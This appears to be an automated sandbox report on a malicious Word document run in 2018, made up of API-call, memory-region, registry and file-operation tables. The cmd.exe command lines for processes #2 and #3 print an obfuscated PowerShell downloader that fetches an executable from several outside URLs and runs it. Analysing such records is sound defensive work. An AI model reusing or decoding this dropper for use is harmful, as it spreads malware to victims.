| Get Address | Unknown module name | function = UnRegisterTypeLib, address_out = 0x7feffe120d0 |
|
2 | |
| Get Address | Unknown module name | function = OleTranslateColor, address_out = 0x7feffdac760 |
|
1 | |
| Get Address | Unknown module name | function = OleCreateFontIndirect, address_out = 0x7feffddecd0 |
|
1 | |
| Get Address | Unknown module name | function = OleCreatePictureIndirect, address_out = 0x7feffdde840 |
|
1 | |
| Get Address | Unknown module name | function = OleLoadPicture, address_out = 0x7feffdef420 |
|
1 | |
| Get Address | Unknown module name | function = OleCreatePropertyFrameIndirect, address_out = 0x7feffde4ec0 |
|
1 | |
| Get Address | Unknown module name | function = OleCreatePropertyFrame, address_out = 0x7feffde9350 |
|
1 | |
| Get Address | Unknown module name | function = OleIconToCursor, address_out = 0x7feffdb6e40 |
|
1 | |
| Get Address | Unknown module name | function = LoadTypeLibEx, address_out = 0x7feffd8a550 |
|
2 | |
| Get Address | Unknown module name | function = OleLoadPictureEx, address_out = 0x7feffdef320 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = GetSystemMetrics, address_out = 0x77a394f0 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = MonitorFromWindow, address_out = 0x77a35f08 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = MonitorFromRect, address_out = 0x77a32b00 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = MonitorFromPoint, address_out = 0x77a2ab64 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = EnumDisplayMonitors, address_out = 0x77a35c30 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = GetMonitorInfoA, address_out = 0x77a2a730 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = EnumDisplayDevicesA, address_out = 0x77a2a5b4 |
|
1 | |
| Get Address | Unknown module name | function = DispCallFunc, address_out = 0x7feffd82270 |
|
1 | |
| Get Address | Unknown module name | function = CreateTypeLib2, address_out = 0x7feffe0dbd0 |
|
1 | |
| Get Address | Unknown module name | function = VarDateFromUdate, address_out = 0x7feffd85c90 |
|
1 | |
| Get Address | Unknown module name | function = VarUdateFromDate, address_out = 0x7feffd86330 |
|
1 | |
| Get Address | Unknown module name | function = GetAltMonthNames, address_out = 0x7feffda66c0 |
|
1 | |
| Get Address | Unknown module name | function = VarNumFromParseNum, address_out = 0x7feffd84710 |
|
1 | |
| Get Address | Unknown module name | function = VarParseNumFromStr, address_out = 0x7feffd848f0 |
|
1 | |
| Get Address | Unknown module name | function = VarDecFromR4, address_out = 0x7feffdbb640 |
|
1 | |
| Get Address | Unknown module name | function = VarDecFromR8, address_out = 0x7feffdbb360 |
|
1 | |
| Get Address | Unknown module name | function = VarDecFromDate, address_out = 0x7feffdc2640 |
|
1 | |
| Get Address | Unknown module name | function = VarDecFromI4, address_out = 0x7feffda58a0 |
|
1 | |
| Get Address | Unknown module name | function = VarDecFromCy, address_out = 0x7feffda5820 |
|
1 | |
| Get Address | Unknown module name | function = VarR4FromDec, address_out = 0x7feffdbaf20 |
|
1 | |
| Get Address | Unknown module name | function = GetRecordInfoFromTypeInfo, address_out = 0x7feffdda0c0 |
|
1 | |
| Get Address | Unknown module name | function = GetRecordInfoFromGuids, address_out = 0x7feffe12160 |
|
1 | |
| Get Address | Unknown module name | function = SafeArrayGetRecordInfo, address_out = 0x7feffda5af0 |
|
1 | |
| Get Address | Unknown module name | function = SafeArraySetRecordInfo, address_out = 0x7feffda5a90 |
|
1 | |
| Get Address | Unknown module name | function = SafeArrayGetIID, address_out = 0x7feffda5a60 |
|
1 | |
| Get Address | Unknown module name | function = SafeArraySetIID, address_out = 0x7feffda5a30 |
|
1 | |
| Get Address | Unknown module name | function = SafeArrayCopyData, address_out = 0x7feffd860b0 |
|
1 | |
| Get Address | Unknown module name | function = SafeArrayAllocDescriptorEx, address_out = 0x7feffd83e90 |
|
1 | |
| Get Address | Unknown module name | function = SafeArrayCreateEx, address_out = 0x7feffdd9f80 |
|
1 | |
| Get Address | Unknown module name | function = VarFormat, address_out = 0x7feffe09b20 |
|
1 | |
| Get Address | Unknown module name | function = VarFormatDateTime, address_out = 0x7feffe09aa0 |
|
1 | |
| Get Address | Unknown module name | function = VarFormatNumber, address_out = 0x7feffe09990 |
|
1 | |
| Get Address | Unknown module name | function = VarFormatPercent, address_out = 0x7feffe09890 |
|
1 | |
| Get Address | Unknown module name | function = VarFormatCurrency, address_out = 0x7feffe09770 |
|
1 | |
| Get Address | Unknown module name | function = VarWeekdayName, address_out = 0x7feffdeb8d0 |
|
1 | |
| Get Address | Unknown module name | function = VarMonthName, address_out = 0x7feffdeb800 |
|
1 | |
| Get Address | Unknown module name | function = VarAdd, address_out = 0x7feffe048e0 |
|
1 | |
| Get Address | Unknown module name | function = VarAnd, address_out = 0x7feffe09470 |
|
1 | |
| Get Address | Unknown module name | function = VarCat, address_out = 0x7feffe096a0 |
|
1 | |
| Get Address | Unknown module name | function = VarDiv, address_out = 0x7feffe02fe0 |
|
1 | |
| Get Address | Unknown module name | function = VarEqv, address_out = 0x7feffe09cf0 |
|
1 | |
| Get Address | Unknown module name | function = VarIdiv, address_out = 0x7feffe08ff0 |
|
1 | |
| Get Address | Unknown module name | function = VarImp, address_out = 0x7feffe09c00 |
|
1 | |
| Get Address | Unknown module name | function = VarMod, address_out = 0x7feffe08e60 |
|
1 | |
| Get Address | Unknown module name | function = VarMul, address_out = 0x7feffe03690 |
|
1 | |
| Get Address | Unknown module name | function = VarOr, address_out = 0x7feffe092d0 |
|
1 | |
| Get Address | Unknown module name | function = VarPow, address_out = 0x7feffe02e80 |
|
1 | |
| Get Address | Unknown module name | function = VarSub, address_out = 0x7feffe03f90 |
|
1 | |
| Get Address | Unknown module name | function = VarXor, address_out = 0x7feffe091a0 |
|
1 | |
| Get Address | Unknown module name | function = VarAbs, address_out = 0x7feffde7c30 |
|
1 | |
| Get Address | Unknown module name | function = VarFix, address_out = 0x7feffde7a60 |
|
1 | |
| Get Address | Unknown module name | function = VarInt, address_out = 0x7feffde7890 |
|
1 | |
| Get Address | Unknown module name | function = VarNeg, address_out = 0x7feffde7ea0 |
|
1 | |
| Get Address | Unknown module name | function = VarNot, address_out = 0x7feffe09600 |
|
1 | |
| Get Address | Unknown module name | function = VarRound, address_out = 0x7feffde76a0 |
|
1 | |
| Get Address | Unknown module name | function = VarCmp, address_out = 0x7feffe083f0 |
|
1 | |
| Get Address | Unknown module name | function = VarDecAdd, address_out = 0x7feffdb3070 |
|
1 | |
| Get Address | Unknown module name | function = VarDecCmp, address_out = 0x7feffdbd700 |
|
1 | |
| Get Address | Unknown module name | function = VarBstrCat, address_out = 0x7feffdbd890 |
|
1 | |
| Get Address | Unknown module name | function = VarCyMulI4, address_out = 0x7feffd9caf0 |
|
1 | |
| Get Address | Unknown module name | function = VarBstrCmp, address_out = 0x7feffda8a00 |
|
1 | |
| Get Address | Unknown module name | address_out = 0x7fee3affcd0 |
|
1 | |
| Get Address | Unknown module name | function = 575, address_out = 0x7fee443b100 |
|
1 | |
| Get Address | Unknown module name | function = 626, address_out = 0x7fee4612a80 |
|
1 |
Window (1)
| Operation | Window Name | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | - | class_name = ThunderMain, wndproc_parameter = 0 |
|
1 |
System (22)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Cursor | x_out = 499, y_out = 71 |
|
3 | |
| Get Time | type = System Time, time = 2018-11-26 15:52:55 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 109107 |
|
1 | |
| Get Time | type = Local Time, time = 2018-11-26 15:52:56 (Local Time) |
|
2 | |
| Get Time | type = Local Time, time = 2018-11-26 15:52:57 (Local Time) |
|
11 | |
| Get Info | type = Operating System |
|
2 | |
| Get Info | type = Operating System |
|
2 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | name = DDRYBUR |
|
1 |
Process #2: cmd.exe
62
0
| Information | Value |
|---|---|
| ID | #2 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | "C:\Windows\System32\cmd.exe" /c C:\Windows\system32\cmd.exe; ,,,,;/V^:^O;/C",;;;,(,(,(^se^t V^Y^w= ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ }}^{^hct^ac^}^}^k^a^erb^;F^Ln^$^ s^secor^P^-^tratS;^)^F^Ln$^(e^lifo^t^ev^as^.TH^E^$^;^)y^doBesn^op^s^er.t^ar^$^(^e^tirw^.T^HE$^;1^ ^= ^e^py^t^.THE^$^;^)^(n^epo^.^THE${ ^)0^0^2 q^e-^ s^u^tat^S.^t^ar^$^( f^I;^)^(^dnes^.tar^$;^)^0,^aiT$^,'TE^G'^(nep^o.tar$^{^yr^t{^)pJ^F^$ ni ^a^i^T$^(^hc^aerof;'m^aert^s^.^bdoda' ^moc- ^tc^ej^bO^-^weN^ = TH^E$;^'^pt^thlm^x^.2^l^mxs^m^'^ ^m^oc- ^tc^e^jbO^-w^eN^=^ t^ar$^;^)'^e^xe^.^D^Gb^\'+^)^(h^ta^PpmeTt^eG^:^:]h^t^aP^.O^I.m^e^tsyS^[^(^=F^Ln^$^;^)^'^@'^(^t^ilp^S.'^Kd^d^ZNjp2/m^oc.^gnidl^i^ubip//:p^t^t^h@^elj^5^Y^ubH/^m^oc.cc^i^hc^ea^lle^b.^w^w^w//:^pt^th^@^wi^e^1Rd^O^P/gr^o^.a^sbwc//:p^t^th^@I^l3vW^tR^u^M/^moc.^mira^sa^tn^ak^ulu//:^p^t^th^@nrw^fw^Q0^i/^moc^.^s^yaw^aev^i^gn^o^itac^avtaer^g//:pt^th'^=^pJF^$;^'cC^u'^=db^b$ lleh^sr^e^wop););)&&;^f^or,;,,;/^L;;,;,%^u,,,,,^in,(^5^54;;;^;;;^;^;^;-1^;^;^;;;^;;;^;;;^-0^;^;;^;^;;^;;^;;);;,;^d^o;;(;s^e^t t^LA^f=!t^LA^f!!V^Y^w:~%^u,1!)&&;i^f;;;%^u,; ,;;,^le^q,^0;(,(c^al^l;;,,,%t^LA^f:^*t^L^A^f!^=%);)" |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:00:58, Reason: Child Process |
| Unmonitor | End Time: 00:01:56, Reason: Self Terminated |
| Monitor Duration | 00:00:58 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa6c |
| Parent PID | 0x8f8 (c:\program files\microsoft office\root\office16\winword.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
A70
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x000c6fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000000d0000 | 0x000d0000 | 0x001cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001d0000 | 0x001d0000 | 0x001d1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000001e0000 | 0x001e0000 | 0x001e0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001f0000 | 0x001f0000 | 0x001f0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000200000 | 0x00200000 | 0x0020ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002b0000 | 0x002b0000 | 0x003affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003b0000 | 0x003b0000 | 0x004affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000004b0000 | 0x004b0000 | 0x00637fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000640000 | 0x00640000 | 0x007c0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000007d0000 | 0x007d0000 | 0x01bcffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001bd0000 | 0x01bd0000 | 0x01f12fff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x01f20000 | 0x021eefff | Memory Mapped File | r |
|
|
|
- |
| cmd.exe | 0x4a9b0000 | 0x4aa08fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77a20000 | 0x77b19fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77b20000 | 0x77c3efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| winbrand.dll | 0x7fef9350000 | 0x7fef9357fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7fefdd60000 | 0x7fefddcafff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7fefdf60000 | 0x7fefdfc6fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7fefed60000 | 0x7fefed8dfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7feff1e0000 | 0x7feff2e8fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x7feff4d0000 | 0x7feff598fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7feff5a0000 | 0x7feff63efff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x7feff860000 | 0x7feff86dfff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x7fefff60000 | 0x7fefff60fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000007fffffdd000 | 0x7fffffdd000 | 0x7fffffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffdf000 | 0x7fffffdf000 | 0x7fffffdffff | Private Memory | rw |
|
|
|
- |
Host Behavior
File (10)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\aETAdzjz\Desktop | type = file_attributes |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
5 | |
| Open | STD_INPUT_HANDLE | - |
|
3 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 24, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cmd.exe | os_pid = 0xa84, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\cmd.exe | base_address = 0x4a9b0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x77b20000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\System32\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadUILanguage, address_out = 0x77b36d40 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileExW, address_out = 0x77b323d0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsDebuggerPresent, address_out = 0x77b28290 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x77b317e0 |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-11-26 15:52:59 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 113443 |
|
1 |
Environment (22)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
7 | |
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client |
|
1 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = ^u,,,,,^in,(^5^54;;;^;;;^;^;^;-1^;^;^;;;^;;;^;;;^-0^;^;;^;^;;^;;^;;);;,;^d^o;;(;s^e^t t^LA^f=!t^LA^f!!V^Y^w |
|
1 | |
| Get Environment String | name = ^u,1!)&&;i^f;;; |
|
1 | |
| Get Environment String | name = ^u,; ,;;,^le^q,^0;(,(c^al^l;;,,, |
|
1 | |
| Get Environment String | name = t^LA^f |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\aETAdzjz\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #3: cmd.exe
46124
0
| Information | Value |
|---|---|
| ID | #3 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe ; ,,,,;/V:O;/C",;;;,(,(,(^se^t V^Y^w= ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ }}^{^hct^ac^}^}^k^a^erb^;F^Ln^$^ s^secor^P^-^tratS;^)^F^Ln$^(e^lifo^t^ev^as^.TH^E^$^;^)y^doBesn^op^s^er.t^ar^$^(^e^tirw^.T^HE$^;1^ ^= ^e^py^t^.THE^$^;^)^(n^epo^.^THE${ ^)0^0^2 q^e-^ s^u^tat^S.^t^ar^$^( f^I;^)^(^dnes^.tar^$;^)^0,^aiT$^,'TE^G'^(nep^o.tar$^{^yr^t{^)pJ^F^$ ni ^a^i^T$^(^hc^aerof;'m^aert^s^.^bdoda' ^moc- ^tc^ej^bO^-^weN^ = TH^E$;^'^pt^thlm^x^.2^l^mxs^m^'^ ^m^oc- ^tc^e^jbO^-w^eN^=^ t^ar$^;^)'^e^xe^.^D^Gb^\'+^)^(h^ta^PpmeTt^eG^:^:]h^t^aP^.O^I.m^e^tsyS^[^(^=F^Ln^$^;^)^'^@'^(^t^ilp^S.'^Kd^d^ZNjp2/m^oc.^gnidl^i^ubip//:p^t^t^h@^elj^5^Y^ubH/^m^oc.cc^i^hc^ea^lle^b.^w^w^w//:^pt^th^@^wi^e^1Rd^O^P/gr^o^.a^sbwc//:p^t^th^@I^l3vW^tR^u^M/^moc.^mira^sa^tn^ak^ulu//:^p^t^th^@nrw^fw^Q0^i/^moc^.^s^yaw^aev^i^gn^o^itac^avtaer^g//:pt^th'^=^pJF^$;^'cC^u'^=db^b$ lleh^sr^e^wop););)&&;^f^or,;,,;/^L;;,;,%^u,,,,,^in,(^5^54;;;^;;;^;^;^;-1^;^;^;;;^;;;^;;;^-0^;^;;^;^;;^;;^;;);;,;^d^o;;(;s^e^t t^LA^f=!t^LA^f!!V^Y^w:~%^u,1!)&&;i^f;;;%^u,; ,;;,^le^q,^0;(,(c^al^l;;,,,%t^LA^f:^*t^L^A^f!^=%);)" |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:00:58, Reason: Child Process |
| Unmonitor | End Time: 00:01:56, Reason: Self Terminated |
| Monitor Duration | 00:00:58 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa84 |
| Parent PID | 0xa6c (c:\windows\system32\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
A88
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0014ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000150000 | 0x00150000 | 0x0024ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00250000 | 0x002b6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000002c0000 | 0x002c0000 | 0x003bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000003c0000 | 0x003c0000 | 0x003c6fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000003d0000 | 0x003d0000 | 0x003dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000003e0000 | 0x003e0000 | 0x00567fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000570000 | 0x00570000 | 0x006f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000700000 | 0x00700000 | 0x01afffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001b00000 | 0x01b00000 | 0x01b01fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000001b10000 | 0x01b10000 | 0x01e52fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001e60000 | 0x01e60000 | 0x01e60fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001e70000 | 0x01e70000 | 0x01e70fff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x01e80000 | 0x0214efff | Memory Mapped File | r |
|
|
|
- |
| cmd.exe | 0x4a9b0000 | 0x4aa08fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77a20000 | 0x77b19fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77b20000 | 0x77c3efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| winbrand.dll | 0x7fef9350000 | 0x7fef9357fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7fefdd60000 | 0x7fefddcafff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7fefdf60000 | 0x7fefdfc6fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7fefed60000 | 0x7fefed8dfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7feff1e0000 | 0x7feff2e8fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x7feff4d0000 | 0x7feff598fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7feff5a0000 | 0x7feff63efff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x7feff860000 | 0x7feff86dfff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x7fefff60000 | 0x7fefff60fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000007fffffdd000 | 0x7fffffdd000 | 0x7fffffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffdf000 | 0x7fffffdf000 | 0x7fffffdffff | Private Memory | rw |
|
|
|
- |
Host Behavior
File (44409)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\aETAdzjz\Desktop | type = file_attributes |
|
2 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
8880 | |
| Open | STD_OUTPUT_HANDLE | - |
|
26645 | |
| Open | STD_INPUT_HANDLE | - |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
2775 | |
| Write | STD_OUTPUT_HANDLE | size = 26 |
|
555 | |
| Write | STD_OUTPUT_HANDLE | size = 1 |
|
1665 | |
| Write | STD_OUTPUT_HANDLE | size = 3 |
|
1110 | |
| Write | STD_OUTPUT_HANDLE | size = 25 |
|
455 | |
| Write | STD_OUTPUT_HANDLE | size = 4 |
|
1110 | |
| Write | STD_OUTPUT_HANDLE | size = 10 |
|
455 | |
| Write | STD_OUTPUT_HANDLE | size = 20 |
|
555 | |
| Write | STD_OUTPUT_HANDLE | size = 24 |
|
90 | |
| Write | STD_OUTPUT_HANDLE | size = 9 |
|
90 | |
| Write | STD_OUTPUT_HANDLE | size = 23 |
|
10 | |
| Write | STD_OUTPUT_HANDLE | size = 8 |
|
10 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 24, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
